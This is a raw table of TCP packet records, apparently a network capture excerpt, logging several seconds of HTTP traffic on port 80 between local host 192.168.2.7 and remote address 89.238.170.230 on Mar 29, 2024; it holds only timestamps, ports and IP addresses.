Mar 29, 2024 14:24:35.595880985 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.596175909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.596273899 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.596348047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.597516060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.597572088 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.597608089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.597620964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.597636938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.597650051 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.597650051 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.597672939 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.597702980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.823978901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.824004889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.824065924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.824076891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.824106932 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.824124098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.824157000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.824177027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.824210882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.824759960 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.825366020 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.825408936 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.826740980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.826765060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.826791048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.826808929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.826853037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.826867104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:35.826898098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:35.826909065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.054075956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054095984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054172993 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.054276943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054291010 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054326057 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.054346085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.054584980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054621935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.054625988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.054666996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.056696892 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.056715965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.056735039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.056735992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.056751013 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.056759119 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.056777954 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.056785107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.056864023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.056902885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.267950058 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.267976046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.268023014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.268070936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.268165112 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.268287897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.271588087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.271707058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.271819115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.271867037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.271888971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.271935940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.272092104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.272140026 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.272145033 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.272190094 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.474641085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.474656105 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.474786997 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.474800110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.474862099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.474900007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.477200031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.477264881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.477288008 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.477317095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.477382898 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.477420092 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.477443933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.477520943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.686511993 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.686530113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.686583996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.686610937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.686624050 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.686626911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.686655045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.686670065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.688607931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.688658953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.688715935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.688755035 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.689162970 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.689174891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.689207077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.689220905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.897991896 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.898011923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.898164988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.898185015 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.898200035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.898238897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.898266077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.900788069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.900816917 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.900840044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.900854111 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.900860071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.900891066 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:36.900899887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:36.900934935 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.115106106 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.115127087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.115140915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.115175962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.115200996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.115212917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.115267038 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.115312099 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.118606091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.118674994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.118688107 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.118740082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.323251009 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.323331118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.323343992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.323371887 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.323589087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.323635101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.323637009 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.323674917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.326679945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.326729059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.326736927 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.326781034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.533082008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.533106089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.533118963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.533163071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.533191919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.533273935 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.533322096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.533354044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.533400059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.535772085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.535809040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.535823107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.535855055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.750790119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.750885963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.750909090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.750946045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.750957966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.751000881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.751229048 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.751266956 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.751266956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.751307011 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.753377914 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.753426075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.753537893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.753583908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.968697071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.968837023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.968854904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.968869925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.968919992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.969017982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.969033003 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.969114065 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.970607042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.970688105 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:37.970771074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:37.970822096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.180888891 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.180957079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.181041002 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.181088924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.181106091 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.181144953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.181165934 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.181202888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.181222916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.181262970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.182162046 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.182203054 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.182233095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.182271957 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.399728060 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.399749994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.399769068 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.399780989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.399828911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.399883032 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.399990082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.400034904 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.400058031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.400094986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.400580883 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.400625944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.400695086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.400738001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.629791975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.629858017 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.629991055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.630009890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.630028963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.630033970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.630052090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.630069971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.630290985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.630327940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.631165028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.631203890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.829443932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.829502106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.838151932 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.838217020 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.838284969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.838332891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.838359118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.838416100 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.838670969 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.838732004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:38.839292049 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:38.839344025 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.033102989 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.033179998 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.042432070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.042496920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.042598963 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.042648077 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.042910099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.042960882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.043956995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.043971062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.044004917 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.044024944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.243767977 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.243787050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.243890047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.252646923 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.252707005 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.252893925 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.252912998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.252943039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.252965927 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.254210949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.254285097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.254317999 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.254376888 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.463028908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.463052988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.463138103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.470712900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.470768929 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.470897913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.470913887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.470947027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.470968962 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.470971107 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.471009970 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.472567081 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.472618103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.472680092 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.472728014 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.681952953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.681988001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.682048082 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.682099104 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.688812971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.688838959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.688894987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.688916922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.689055920 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.689080000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.689135075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.689156055 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.690656900 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.690697908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.690713882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.690731049 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.690747976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.690783978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.904912949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.905020952 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.910811901 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.910876989 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.910937071 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.910989046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.911000967 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.911048889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.912189007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.912254095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.912270069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.912282944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.912482023 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.912528992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:39.912548065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:39.912590027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.133752108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.133868933 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.138900042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.138957977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.139127016 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.139175892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.139215946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.139255047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.140335083 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.140372038 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.140635014 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.140702963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.363162994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.363257885 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.368071079 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.368129969 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.368153095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.368191004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.368287086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.368330956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.369317055 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.369388103 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.369576931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.369632006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.570364952 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.570434093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.577480078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.577496052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.577575922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.577591896 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.577652931 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.577666998 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.577696085 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.577708006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:40.578916073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:40.578928947 CET	80	49699	89.238.170.230	192.168.2.7
